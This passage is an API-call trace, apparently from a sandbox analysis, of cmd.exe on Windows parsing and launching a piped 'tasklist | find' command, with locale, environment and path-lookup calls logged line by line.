_String2="RANDOM") returned -7 [0111.859] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0111.859] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x6cfbec | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0111.859] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0x6cfbec, lpFilePart=0x6cfbe8 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x6cfbe8*="Desktop") returned 0x1c [0111.859] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0111.859] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x6cf968 | out: lpFindFileData=0x6cf968) returned 0x8242d8 [0111.859] FindClose (in: hFindFile=0x8242d8 | out: hFindFile=0x8242d8) returned 1 [0111.859] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0x6cf968 | out: lpFindFileData=0x6cf968) returned 0x8242d8 [0111.859] FindClose (in: hFindFile=0x8242d8 | out: hFindFile=0x8242d8) returned 1 [0111.859] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0111.859] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0x6cf968 | out: lpFindFileData=0x6cf968) returned 0x8242d8 [0111.860] FindClose (in: hFindFile=0x8242d8 | out: hFindFile=0x8242d8) returned 1 [0111.860] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0111.860] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0111.860] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0111.860] GetEnvironmentStringsW () returned 0x826190* [0111.860] FreeEnvironmentStringsA (penv="=") returned 1 [0111.860] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0111.860] GetConsoleOutputCP () returned 0x1b5 [0111.860] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0111.860] GetUserDefaultLCID () returned 0x409 [0111.861] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0111.861] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x6cfd18, cchData=128 | out: lpLCData="0") returned 2 [0111.861] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x6cfd18, cchData=128 | out: lpLCData="0") returned 2 [0111.861] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x6cfd18, cchData=128 | out: lpLCData="1") returned 2 [0111.861] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0111.861] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0111.861] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0111.861] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0111.861] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0111.861] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0111.861] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0111.861] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0111.861] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0111.861] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0111.861] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0111.862] GetConsoleTitleW (in: lpConsoleTitle=0x824e28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0111.862] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0111.862] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0111.862] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0111.862] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0111.863] _wcsicmp (_String1="tasklist", _String2=")") returned 75 [0111.863] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14 [0111.863] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14 [0111.863] _wcsicmp (_String1="IF", _String2="tasklist") returned -11 [0111.863] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11 [0111.863] _wcsicmp (_String1="REM", _String2="tasklist") returned -2 [0111.863] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2 [0111.863] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0111.863] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0111.863] _wcsicmp (_String1="IF", _String2="find") returned 3 [0111.863] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0111.863] _wcsicmp (_String1="REM", _String2="find") returned 12 [0111.863] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0111.864] _pipe (in: _PtHandles=0x8251f0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0x8251f0) returned 0 [0111.864] _dup (_FileHandle=1) returned 5 [0111.864] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0111.864] _close (_FileHandle=4) returned 0 [0111.865] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0111.865] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0111.865] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0111.865] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0111.865] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0111.865] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0111.865] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0111.865] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0111.865] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0111.865] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0111.865] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0111.865] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0111.865] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0111.865] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0111.865] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0111.865] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0111.865] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0111.865] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0111.865] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0111.865] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0111.865] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0111.865] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0111.865] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0111.865] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0111.865] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0111.865] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0111.865] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0111.865] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0111.865] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0111.865] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0111.865] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0111.865] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0111.865] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0111.865] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0111.865] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0111.866] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0111.866] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0111.866] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0111.866] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0111.866] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0111.866] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0111.866] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0111.866] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0111.866] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0111.866] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0111.866] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0111.866] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0111.866] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0111.866] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0111.866] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0111.866] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0111.866] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0111.866] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0111.866] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0111.866] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0111.866] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0111.866] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0111.866] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0111.866] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0111.866] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0111.866] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0111.866] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0111.866] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0111.866] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0111.866] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0111.866] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0111.866] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0111.866] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0111.866] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0111.866] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0111.866] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0111.866] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0111.866] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0111.866] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0111.866] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0111.866] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0111.866] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0111.866] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0111.866] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0111.866] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0111.866] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0111.866] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0111.866] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0111.866] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0111.866] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14 [0111.866] _wcsicmp (_String1="tasklist", _String2="IF") returned 11 [0111.866] _wcsicmp (_String1="tasklist", _String2="REM") returned 2 [0111.867] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0111.867] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0111.867] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0111.867] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0111.867] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0111.867] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0111.867] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0111.867] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0111.867] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0111.867] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0111.867] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0111.867] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0111.867] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0111.867] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0111.867] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0111.867] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0111.867] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0111.867] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0111.867] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0111.867] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0111.867] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0111.867] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0111.867] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0111.867] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0111.867] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0111.867] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0111.867] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0111.867] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0111.867] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0111.867] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0111.867] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0111.867] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0111.867] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0111.867] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0111.867] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0111.867] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0111.867] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0111.867] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0111.867] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0111.867] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0111.867] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0111.867] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0111.867] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0111.868] SetErrorMode (uMode=0x0) returned 0x0 [0111.868] SetErrorMode (uMode=0x1) returned 0x0 [0111.868] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x825228, lpFilePart=0x6cfb74 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x6cfb74*="Desktop") returned 0x1c [0111.868] SetErrorMode (uMode=0x0) returned 0x1 [0111.868] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0111.868] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0111.872] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0111.872] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0111.872] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x6cf900, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6cf900) returned 0xffffffff [0111.872] GetLastError () returned 0x2 [0111.872] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0111.872] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x6cf900, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6cf900) returned 0x825530 [0111.873] FindClose (in: hFindFile=0x825530 | out: hFindFile=0x825530) returned 1 [0111.873] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x6cf900, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6cf900) returned 0xffffffff [0111.873] GetLastError () returned 0x2 [0111.873] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x6cf900, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6cf900) returned 0x825530 [0111.873] FindClose (in: hFindFile=0x825530 | out: hFindFile=0x825530) returned 1 [0111.873] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0111.873] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0111.873] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0111.873] SetErrorMode (uMode=0x0) returned 0x0 [0111.873] SetErrorMode (uMode=0x1) returned 0x0 [0111.873] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x82a3c0, lpFilePart=0x6cf91c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x6cf91c*="Desktop") returned 0x1c [0111.873] SetErrorMode (uMode=0x0) returned 0x1 [0111.873] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0111.873] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0111.873] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0111.873] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0111.873] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x6cf6a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6cf6a8) returned 0xffffffff [0111.874] GetLastError () returned 0x2 [0111.874] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0111.874] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x6cf6a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6cf6a8) returned 0x825628 [0111.874] FindClose (in: hFindFile=0x825628 | out: hFindFile=0x825628) returned 1 [0111.874] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x6cf6a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6cf6a8) returned 0xffffffff [0111.874] GetLastError () returned 0x2 [0111.874] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x6cf6a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6cf6a8) returned 0x825628 [0111.874] FindClose (in: hFindFile=0x825628 | out: hFindFile=0x825628) returned 1 [0111.874] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0111.874] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0111.874] GetConsoleTitleW (in: lpConsoleTitle=0x6cfba4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0111.874] InitializeProcThreadAttributeList (in: lpAttributeList=0x6cfad0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x6cfab4 | out: lpAttributeList=0x6cfad0, lpSize=0x6cfab4) returned 1 [0111.874] UpdateProcThreadAttribute (in: lpAttributeList=0x6cfad0, dwFlags=0x0, Attribute=0x60001, lpValue=0x6cfabc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x6cfad0, lpPreviousValue=0x0) returned 1 [0111.875] GetStartupInfoW (in: lpStartupInfo=0x6cfb08 | out: lpStartupInfo=0x6cfb08*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x24c, hStdError=0x2c)) [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0111.875] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0111.875] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1 [0111.877] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x6cfa58*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tasklist", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x6cfaa4 | out: lpCommandLine="tasklist", lpProcessInformation=0x6cfaa4*(hProcess=0x64, hThread=0x60, dwProcessId=0x7d8, dwThreadId=0x6b4)) returned 1 [0111.880] CloseHandle (hObject=0x60) returned 1 [0111.880] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0111.880] GetEnvironmentStringsW () returned 0x8242d8* [0111.880] FreeEnvironmentStringsA (penv="=") returned 1 [0111.880] DeleteProcThreadAttributeList (in: lpAttributeList=0x6cfad0 | out: lpAttributeList=0x6cfad0) [0111.880] _get_osfhandle (_FileHandle=3) returned 0x54 [0111.880] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0111.880] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0111.880] _close (_FileHandle=5) returned 0 [0111.880] _dup (_FileHandle=0) returned 4 [0111.880] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0111.880] _close (_FileHandle=3) returned 0 [0111.880] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0111.880] SetErrorMode (uMode=0x0) returned 0x0 [0111.880] SetErrorMode (uMode=0x1) returned 0x0 [0111.880] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x8242e0, lpFilePart=0x6cfb74 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x6cfb74*="Desktop") returned 0x1c [0111.880] SetErrorMode (uMode=0x0) returned 0x1 [0111.880] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 